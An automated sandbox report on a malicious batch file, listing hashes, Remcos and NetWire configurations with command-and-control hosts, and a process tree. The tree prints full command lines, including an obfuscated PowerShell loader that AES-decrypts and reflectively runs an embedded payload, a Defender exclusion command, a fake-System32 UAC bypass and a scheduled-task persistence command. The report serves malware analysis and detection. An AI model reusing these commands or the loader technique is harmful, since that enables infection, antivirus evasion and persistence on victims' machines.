Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2023 06:45
Static task
static1
Behavioral task
behavioral1
Sample
mynew.bat
Resource
win7-20220812-en
General
-
Target
mynew.bat
-
Size
49KB
-
MD5
f010a779fc5fa3c0d6ef8d08cf2f82c3
-
SHA1
37dec5efe2443e43a4290473b372a40bd9f494f9
-
SHA256
7361111dc12ff526cb5391edfadb0a9ce69e75ba8d12b31122b224f9644290c0
-
SHA512
b76595be308c2e5c23e1f7e578573b1e108885d868a34ae10f18756de7f27f9be1beebc31b2e8275851bfa898f1a15b758ce3f903e7c888895a7779471670db8
-
SSDEEP
768:m/7oBdu40Ozbblz1Osan4ha4j0YJDH7bzzE1k07LEHZMIXlOJFt0X495YrS8ra:aEBvHblRI4hJDHnk1dvEVwJL649O2
Malware Config
Extracted
remcos
DEC2022
retsuportm.ddnsfree.com:2404
spreadrem1.ddnsfree.com:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
EXAMPLE.exe
-
copy_folder
EXAMPLE
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
YHGFTRDE.dat
-
keylog_flag
false
-
mouse_option
false
-
mutex
HPLKVPJH-J4G225
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
netwire
febnew2.ddns.net:6655
febnew1.ddns.net:6655
febnew4.ddns.net:6655
febnew5.ddns.net:6655
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
install_path
%AppData%\Install\Host.exe
-
lock_executable
false
-
offline_keylogger
false
-
password
1234
-
registry_autorun
false
-
use_mutex
false
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
NetWire RAT payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/760-194-0x0000000000400000-0x0000000000445000-memory.dmp netwire behavioral2/memory/760-197-0x0000000000400000-0x0000000000445000-memory.dmp netwire behavioral2/memory/760-198-0x0000000000400000-0x0000000000444095-memory.dmp netwire behavioral2/memory/760-202-0x0000000000400000-0x0000000000444095-memory.dmp netwire behavioral2/memory/2040-225-0x0000000000400000-0x0000000000445000-memory.dmp netwire behavioral2/memory/2040-227-0x0000000000400000-0x0000000000444095-memory.dmp netwire -
ModiLoader Second Stage 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3200-147-0x0000000000A20000-0x0000000000A4F000-memory.dmp modiloader_stage2 behavioral2/memory/5108-186-0x0000000002270000-0x000000000229F000-memory.dmp modiloader_stage2 behavioral2/memory/2532-205-0x00000000021D0000-0x00000000021FF000-memory.dmp modiloader_stage2 -
Executes dropped EXE 9 IoCs
Processes:
mynew.bat.exembekur.exeeasinvoker.exembekur.exejjweiy.exejjweiy.exeHost.exedhylty.bat.exeHost.exepid process 4536 mynew.bat.exe 3200 mbekur.exe 1716 easinvoker.exe 2964 mbekur.exe 5108 jjweiy.exe 760 jjweiy.exe 2532 Host.exe 1200 dhylty.bat.exe 2040 Host.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mynew.bat.exejjweiy.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation mynew.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation jjweiy.exe -
Loads dropped DLL 1 IoCs
Processes:
easinvoker.exepid process 1716 easinvoker.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
mbekur.exejjweiy.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oxzfbvmf = "C:\\Users\\Public\\Libraries\\fmvbfzxO.url" mbekur.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Takipqpe = "C:\\Users\\Public\\Libraries\\epqpikaT.url" jjweiy.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 58 api.ipify.org 59 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
Processes:
mbekur.exejjweiy.exeHost.exedescription pid process target process PID 3200 set thread context of 2964 3200 mbekur.exe mbekur.exe PID 5108 set thread context of 760 5108 jjweiy.exe jjweiy.exe PID 2532 set thread context of 2040 2532 Host.exe Host.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
xcopy.exexcopy.exexcopy.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
mynew.bat.exepowershell.exepowershell.exepowershell.exepowershell.exedhylty.bat.exepid process 4536 mynew.bat.exe 4536 mynew.bat.exe 1732 powershell.exe 1732 powershell.exe 960 powershell.exe 960 powershell.exe 3444 powershell.exe 3444 powershell.exe 1420 powershell.exe 1420 powershell.exe 1200 dhylty.bat.exe 1200 dhylty.bat.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
mbekur.exepid process 2964 mbekur.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
mynew.bat.exepowershell.exepowershell.exepowershell.exepowershell.exedhylty.bat.exedescription pid process Token: SeDebugPrivilege 4536 mynew.bat.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 3444 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeDebugPrivilege 1200 dhylty.bat.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
dhylty.bat.exepid process 1200 dhylty.bat.exe 1200 dhylty.bat.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
dhylty.bat.exepid process 1200 dhylty.bat.exe 1200 dhylty.bat.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
mbekur.exedhylty.bat.exepid process 2964 mbekur.exe 1200 dhylty.bat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemynew.bat.execmd.exepowershell.exembekur.execmd.exeeasinvoker.execmd.execmd.exepowershell.exejjweiy.exejjweiy.execmd.exepowershell.execmd.exedescription pid process target process PID 3684 wrote to memory of 4536 3684 cmd.exe mynew.bat.exe PID 3684 wrote to memory of 4536 3684 cmd.exe mynew.bat.exe PID 4536 wrote to memory of 1440 4536 mynew.bat.exe cmd.exe PID 4536 wrote to memory of 1440 4536 mynew.bat.exe cmd.exe PID 1440 wrote to memory of 1732 1440 cmd.exe powershell.exe PID 1440 wrote to memory of 1732 1440 cmd.exe powershell.exe PID 1732 wrote to memory of 3200 1732 powershell.exe mbekur.exe PID 1732 wrote to memory of 3200 1732 powershell.exe mbekur.exe PID 1732 wrote to memory of 3200 1732 powershell.exe mbekur.exe PID 3200 wrote to memory of 3344 3200 mbekur.exe cmd.exe PID 3200 wrote to memory of 3344 3200 mbekur.exe cmd.exe PID 3200 wrote to memory of 3344 3200 mbekur.exe cmd.exe PID 3344 wrote to memory of 860 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 860 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 860 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 2580 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 2580 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 2580 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 2892 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 2892 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 2892 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 3828 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 3828 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 3828 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 2612 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 2612 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 2612 3344 cmd.exe cmd.exe PID 3344 wrote to memory of 3184 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 3184 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 3184 3344 cmd.exe xcopy.exe PID 3344 wrote to memory of 1716 3344 cmd.exe easinvoker.exe PID 3344 wrote to memory of 1716 3344 cmd.exe easinvoker.exe PID 1716 wrote to memory of 4124 1716 easinvoker.exe cmd.exe PID 1716 wrote to memory of 4124 1716 easinvoker.exe cmd.exe PID 3344 wrote to memory of 876 3344 cmd.exe PING.EXE PID 3344 wrote to memory of 876 3344 cmd.exe PING.EXE PID 3344 wrote to memory of 876 3344 cmd.exe PING.EXE PID 4124 wrote to memory of 960 4124 cmd.exe powershell.exe PID 4124 wrote to memory of 960 4124 cmd.exe powershell.exe PID 3200 wrote to memory of 2964 3200 mbekur.exe mbekur.exe PID 3200 wrote to memory of 2964 3200 mbekur.exe mbekur.exe PID 3200 wrote to memory of 2964 3200 mbekur.exe mbekur.exe PID 3200 wrote to memory of 2964 3200 mbekur.exe mbekur.exe PID 4536 wrote to memory of 1476 4536 mynew.bat.exe cmd.exe PID 4536 wrote to memory of 1476 4536 mynew.bat.exe cmd.exe PID 1476 wrote to memory of 3444 1476 cmd.exe powershell.exe PID 1476 wrote to memory of 3444 1476 cmd.exe powershell.exe PID 3444 wrote to memory of 5108 3444 powershell.exe jjweiy.exe PID 3444 wrote to memory of 5108 3444 powershell.exe jjweiy.exe PID 3444 wrote to memory of 5108 3444 powershell.exe jjweiy.exe PID 5108 wrote to memory of 760 5108 jjweiy.exe jjweiy.exe PID 5108 wrote to memory of 760 5108 jjweiy.exe jjweiy.exe PID 5108 wrote to memory of 760 5108 jjweiy.exe jjweiy.exe PID 5108 wrote to memory of 760 5108 jjweiy.exe jjweiy.exe PID 760 wrote to memory of 2532 760 jjweiy.exe Host.exe PID 760 wrote to memory of 2532 760 jjweiy.exe Host.exe PID 760 wrote to memory of 2532 760 jjweiy.exe Host.exe PID 4536 wrote to memory of 3808 4536 mynew.bat.exe cmd.exe PID 4536 wrote to memory of 3808 4536 mynew.bat.exe cmd.exe PID 3808 wrote to memory of 1420 3808 cmd.exe powershell.exe PID 3808 wrote to memory of 1420 3808 cmd.exe powershell.exe PID 1420 wrote to memory of 2316 1420 powershell.exe cmd.exe PID 1420 wrote to memory of 2316 1420 powershell.exe cmd.exe PID 2316 wrote to memory of 1200 2316 cmd.exe dhylty.bat.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mynew.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe"mynew.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Hnouz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mynew.bat').Split([Environment]::NewLine);foreach ($aOvdy in $Hnouz) { if ($aOvdy.StartsWith(':: ')) { $VFBbN = $aOvdy.Substring(3); break; }; };$APbgZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFBbN);$TxOqK = New-Object System.Security.Cryptography.AesManaged;$TxOqK.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TxOqK.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TxOqK.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=');$TxOqK.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QyA1AR4yRiYXGDMq0ZKCyQ==');$mOLfG = $TxOqK.CreateDecryptor();$APbgZ = $mOLfG.TransformFinalBlock($APbgZ, 0, $APbgZ.Length);$mOLfG.Dispose();$TxOqK.Dispose();$nIAlk = New-Object System.IO.MemoryStream(, $APbgZ);$GUMsr = New-Object System.IO.MemoryStream;$ourVj = New-Object System.IO.Compression.GZipStream($nIAlk, [IO.Compression.CompressionMode]::Decompress);$ourVj.CopyTo($GUMsr);$ourVj.Dispose();$nIAlk.Dispose();$GUMsr.Dispose();$APbgZ = $GUMsr.ToArray();$uPpYS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($APbgZ);$vzwYm = $uPpYS.EntryPoint;$vzwYm.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\mbekur.exe"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OxzfbvmfO.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"7⤵PID:860
-
C:\Windows\SysWOW64\xcopy.exexcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y7⤵
- Enumerates system info in registry
PID:2580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"7⤵PID:2892
-
C:\Windows\SysWOW64\xcopy.exexcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y7⤵
- Enumerates system info in registry
PID:3828 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"7⤵PID:2612
-
C:\Windows\SysWOW64\xcopy.exexcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y7⤵
- Enumerates system info in registry
PID:3184 -
C:\Windows \System32\easinvoker.exe"C:\Windows \System32\easinvoker.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""8⤵
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 67⤵
- Runs ping.exe
PID:876 -
C:\Users\Admin\AppData\Local\Temp\mbekur.exe"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"C:\Users\Admin\AppData\Roaming\Install\Host.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2532 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"C:\Users\Admin\AppData\Roaming\Install\Host.exe"8⤵
- Executes dropped EXE
PID:2040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dhylty.bat"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dhylty.bat"'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dhylty.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe"dhylty.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $AXUkl = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dhylty.bat').Split([Environment]::NewLine);foreach ($nOPQh in $AXUkl) { if ($nOPQh.StartsWith(':: ')) { $HPzIn = $nOPQh.Substring(3); break; }; };$xWiBK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HPzIn);$KChVS = New-Object System.Security.Cryptography.AesManaged;$KChVS.Mode = [System.Security.Cryptography.CipherMode]::CBC;$KChVS.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$KChVS.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XW1/OClWDve6Edb4EFAPZMdLe56JDSmtEzYudqGm378=');$KChVS.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F5W/JJjAW9BS5IMGApFnNw==');$UHtkB = $KChVS.CreateDecryptor();$xWiBK = $UHtkB.TransformFinalBlock($xWiBK, 0, $xWiBK.Length);$UHtkB.Dispose();$KChVS.Dispose();$PLWwk = New-Object System.IO.MemoryStream(, $xWiBK);$pxfaJ = New-Object System.IO.MemoryStream;$PkfiQ = New-Object System.IO.Compression.GZipStream($PLWwk, [IO.Compression.CompressionMode]::Decompress);$PkfiQ.CopyTo($pxfaJ);$PkfiQ.Dispose();$PLWwk.Dispose();$pxfaJ.Dispose();$xWiBK = $pxfaJ.ToArray();$hrwta = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($xWiBK);$stuRW = $hrwta.EntryPoint;$stuRW.Invoke($null, (, [string[]] ('')))6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:4932
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868Filesize
471B
MD5754711319399d090fd83609c28768137
SHA19733fc959a8fe4bcb71d761e62e8eae9e3bb29a7
SHA256faa2fc7e8f87dc56ba6ba03f3f2d535277f2db38d561cfb67e103631c96287f7
SHA512106f3978e9e0a2edfac6a57c95c3a6cd99b0d7a9ea7d5aba6fa374a31693be33b99eaa80874a284d71eb03a5b8b4ef1dec542202c05116f5ef050f8f769de1d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53Filesize
471B
MD5c136901c2a0696f7a5f4f45ba8725699
SHA1a319de4877fc337bf0d9e9366c4060e306e1be0d
SHA256d1fb0a203dfd0d3f900b66de6bc827fcefa90d39e291ef1a7c580ce83faef63d
SHA5123bf064914a874a96834c35e0859f4338c1422e9cecb913d591aa9ce341da2e4976ed428f3a00f985b699787f118d1558c881b8aa1d102e3da0adbdaf476f5c50
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868Filesize
412B
MD54aead5217b122334672f2034e460c097
SHA1da04f5c67d2e95b7123017c1d38428a14ddbaba4
SHA25691d3257e30f2fb8b3603ba8f8fd4bd7573e7d908a928ebd5f970039b5505ceac
SHA51260a389f87db4c715400570fb0c1a8df0d17f0a84d1cd2eb3a5c050a87d81b2c47044ddaad647a04c6e226c80f8805f477d7cff4a95ded3c9c04b189f6074bb5b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53Filesize
442B
MD50b88eee4a66ec67db4df40c29f1f71e1
SHA12cfb80792ce5ddbd13d837f1ac9c0c189346d84a
SHA2565e52f871f1b84209c4d549fab9bfa8e871114bcfb54d9ada82e729ad58cba2b3
SHA512e7397ae2354c11314a013b0a5382b3e6f718af450df3c2f59e1fb5a47c85747f12e29edbe6581a23b1dd53c3a9a7bfa7ad4cedd35ee973af71c49ce15f3061e7
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\AppData\Local\Temp\dhylty.batFilesize
325KB
MD5c3a6545c16eee6297947ed8620de4717
SHA14debd4e38ad82335e0a6eea50a52259cf3ccf4ae
SHA2563152854e19471a68674c0e8c61822a78e4c5fc159c03f9635b647570a4d91ddb
SHA5123dd9e1f43e67bf52b311f18afc8adce4ee3086ab226532453a559a0e644c6772ea4bf3fa25c54a917486156b9c0014c2296e9f58e8b7e4f49033cef967e215a8
-
C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\jjweiy.exeFilesize
822KB
MD5775a301382aacf4b63ff30d3f96064d1
SHA1259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Admin\AppData\Local\Temp\jjweiy.exeFilesize
822KB
MD5775a301382aacf4b63ff30d3f96064d1
SHA1259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Admin\AppData\Local\Temp\jjweiy.exeFilesize
822KB
MD5775a301382aacf4b63ff30d3f96064d1
SHA1259a6cc69706fb89db2aaa52f3f05f62b683dd03
SHA256f10974dce5ad70d94973673dec2e92001a251cbf488a86faf3007180bbb1e04f
SHA512048f637a8b1d807bb4c606795b526a14a05381c257d5118a6b9180ff7b7862274a8607fee9ef19ee8f07b533178b546a62835052d3b2fdddc0aeb42b43f3a19c
-
C:\Users\Admin\AppData\Local\Temp\mbekur.exeFilesize
753KB
MD5d47ef0caf476ae21f22c346071670ffd
SHA1b61fda99693875bc3959d0530debaa2e71587584
SHA2563372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57
SHA5121b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba
-
C:\Users\Admin\AppData\Local\Temp\mbekur.exeFilesize
753KB
MD5d47ef0caf476ae21f22c346071670ffd
SHA1b61fda99693875bc3959d0530debaa2e71587584
SHA2563372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57
SHA5121b0751deb1ff69959468d6d653c63ca3b641c425088d1d231f5cfe16fa7d7ebdde294a2563f6155d1ea6a8bb2289e662054ce671732860781e8ddbc31bdde6ba
-
C:\Users\Admin\AppData\Local\Temp\mbekur.exeFilesize
753KB
MD5d47ef0caf476ae21f22c346071670ffd
SHA1b61fda99693875bc3959d0530debaa2e71587584
SHA2563372eb917cd3d9518ad291b3109b9390e4a953e252f776fed4b73849250a7c57
